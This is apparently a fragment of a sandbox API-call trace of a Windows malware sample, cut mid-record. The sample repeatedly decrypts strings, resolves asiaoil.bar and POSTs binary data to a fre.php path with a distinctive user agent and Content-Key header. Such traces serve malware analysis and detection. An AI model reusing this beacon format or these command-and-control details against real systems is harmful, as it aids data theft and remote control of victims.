returned 0x763938 [0320.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.139] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.144] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0320.151] GetProcessHeap () returned 0x740000 [0320.151] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0320.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.152] CryptImportKey (in: hProv=0x75d298, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0320.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.153] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.156] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.156] GetProcessHeap () returned 0x740000 [0320.157] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0320.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.171] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763938, pdwDataLen=0x19fcfc | out: pbData=0x763938, pdwDataLen=0x19fcfc) returned 1 [0320.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.172] CryptDestroyKey (hKey=0x74d768) returned 1 [0320.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.172] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0320.172] GetProcessHeap () returned 0x740000 [0320.173] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0320.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.173] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.174] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.175] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.176] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.176] GetProcessHeap () returned 0x740000 [0320.176] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be40 [0320.176] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0320.176] GetProcessHeap () returned 0x740000 [0320.177] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be40 | out: hHeap=0x740000) returned 1 [0320.177] GetProcessHeap () returned 0x740000 [0320.177] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0320.177] GetProcessHeap () returned 0x740000 [0320.177] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0320.177] GetProcessHeap () returned 0x740000 [0320.177] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7638a8 [0320.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.178] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.184] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cf68) returned 1 [0320.191] GetProcessHeap () returned 0x740000 [0320.191] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0320.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.192] CryptImportKey (in: hProv=0x75cf68, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0320.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.193] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.194] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.194] GetProcessHeap () returned 0x740000 [0320.195] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0320.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.195] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7638a8, pdwDataLen=0x19fcfc | out: pbData=0x7638a8, pdwDataLen=0x19fcfc) returned 1 [0320.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.196] CryptDestroyKey (hKey=0x74d768) returned 1 [0320.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.197] CryptReleaseContext (hProv=0x75cf68, dwFlags=0x0) returned 1 [0320.197] GetProcessHeap () returned 0x740000 [0320.197] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0320.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.198] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0320.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.199] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0320.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.200] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0320.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.201] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0320.201] GetProcessHeap () returned 0x740000 [0320.201] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0320.201] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0320.246] GetProcessHeap () returned 0x740000 [0320.246] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b530 [0320.246] socket (af=2, type=1, protocol=6) returned 0x350 [0320.246] connect (s=0x350, name=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0320.265] FreeAddrInfoW (pAddrInfo=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0320.265] GetProcessHeap () returned 0x740000 [0320.265] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d210 [0320.265] GetProcessHeap () returned 0x740000 [0320.265] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0320.265] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0320.266] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0320.266] GetProcessHeap () returned 0x740000 [0320.266] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0320.266] GetProcessHeap () returned 0x740000 [0320.267] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0320.267] GetProcessHeap () returned 0x740000 [0320.267] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d28 [0320.267] GetProcessHeap () returned 0x740000 [0320.267] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0320.268] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0320.268] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0320.268] GetProcessHeap () returned 0x740000 [0320.268] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0320.268] GetProcessHeap () returned 0x740000 [0320.269] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0320.269] send (s=0x350, buf=0x747928*, len=243, flags=0) returned 243 [0320.269] send (s=0x350, buf=0x761fd0*, len=159, flags=0) returned 159 [0320.269] GetProcessHeap () returned 0x740000 [0320.270] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0320.270] recv (in: s=0x350, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 563 [0320.361] GetProcessHeap () returned 0x740000 [0320.362] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0320.362] GetProcessHeap () returned 0x740000 [0320.362] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d28 | out: hHeap=0x740000) returned 1 [0320.362] GetProcessHeap () returned 0x740000 [0320.362] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0320.363] GetProcessHeap () returned 0x740000 [0320.363] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d210 | out: hHeap=0x740000) returned 1 [0320.363] closesocket (s=0x350) returned 0 [0320.364] GetProcessHeap () returned 0x740000 [0320.364] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b530 | out: hHeap=0x740000) returned 1 [0320.364] GetProcessHeap () returned 0x740000 [0320.364] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0320.364] GetProcessHeap () returned 0x740000 [0320.364] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7638a8 | out: hHeap=0x740000) returned 1 [0320.364] GetProcessHeap () returned 0x740000 [0320.364] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0320.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1134) returned 0x350 [0320.366] Sleep (dwMilliseconds=0xea60) [0320.369] GetProcessHeap () returned 0x740000 [0320.369] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763c98 [0320.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.384] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.390] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0320.397] GetProcessHeap () returned 0x740000 [0320.397] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0320.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.398] CryptImportKey (in: hProv=0x75cc38, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0320.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.399] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.400] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.400] GetProcessHeap () returned 0x740000 [0320.400] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0320.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.501] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763c98, pdwDataLen=0x19fcfc | out: pbData=0x763c98, pdwDataLen=0x19fcfc) returned 1 [0320.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.502] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0320.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.503] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0320.503] GetProcessHeap () returned 0x740000 [0320.503] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0320.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.504] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.505] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.506] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.507] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.507] GetProcessHeap () returned 0x740000 [0320.507] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0320.507] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0320.508] GetProcessHeap () returned 0x740000 [0320.509] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0320.509] GetProcessHeap () returned 0x740000 [0320.509] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0320.509] GetProcessHeap () returned 0x740000 [0320.509] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0320.509] GetProcessHeap () returned 0x740000 [0320.509] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0320.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.511] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.538] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0320.548] GetProcessHeap () returned 0x740000 [0320.548] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0320.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.549] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0320.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.594] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.595] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.595] GetProcessHeap () returned 0x740000 [0320.595] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0320.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.599] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0320.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.599] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0320.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.600] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0320.600] GetProcessHeap () returned 0x740000 [0320.600] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0320.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.601] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0320.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.602] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0320.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.603] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0320.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.604] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0320.604] GetProcessHeap () returned 0x740000 [0320.604] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0320.604] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0320.605] GetProcessHeap () returned 0x740000 [0320.605] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0320.605] socket (af=2, type=1, protocol=6) returned 0x354 [0320.606] connect (s=0x354, name=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0320.629] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0320.629] GetProcessHeap () returned 0x740000 [0320.629] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cdd0 [0320.629] GetProcessHeap () returned 0x740000 [0320.629] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0320.630] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0320.630] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0320.630] GetProcessHeap () returned 0x740000 [0320.630] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0320.630] GetProcessHeap () returned 0x740000 [0320.631] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0320.631] GetProcessHeap () returned 0x740000 [0320.631] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763e00 [0320.631] GetProcessHeap () returned 0x740000 [0320.631] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0320.632] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0320.632] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0320.632] GetProcessHeap () returned 0x740000 [0320.632] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0320.632] GetProcessHeap () returned 0x740000 [0320.633] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0320.633] send (s=0x354, buf=0x747928*, len=243, flags=0) returned 243 [0320.633] send (s=0x354, buf=0x761fd0*, len=159, flags=0) returned 159 [0320.633] GetProcessHeap () returned 0x740000 [0320.633] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0320.633] recv (in: s=0x354, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 573 [0320.768] GetProcessHeap () returned 0x740000 [0320.769] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0320.769] GetProcessHeap () returned 0x740000 [0320.769] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763e00 | out: hHeap=0x740000) returned 1 [0320.769] GetProcessHeap () returned 0x740000 [0320.769] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0320.769] GetProcessHeap () returned 0x740000 [0320.769] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cdd0 | out: hHeap=0x740000) returned 1 [0320.769] closesocket (s=0x354) returned 0 [0320.770] GetProcessHeap () returned 0x740000 [0320.770] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0320.770] GetProcessHeap () returned 0x740000 [0320.770] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0320.781] GetProcessHeap () returned 0x740000 [0320.781] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0320.781] GetProcessHeap () returned 0x740000 [0320.782] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0320.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6b8) returned 0x354 [0320.784] Sleep (dwMilliseconds=0xea60) [0320.789] GetProcessHeap () returned 0x740000 [0320.789] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0320.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.791] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.800] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0320.808] GetProcessHeap () returned 0x740000 [0320.808] RtlAllocateHeap (HeapHandle=0x740000, 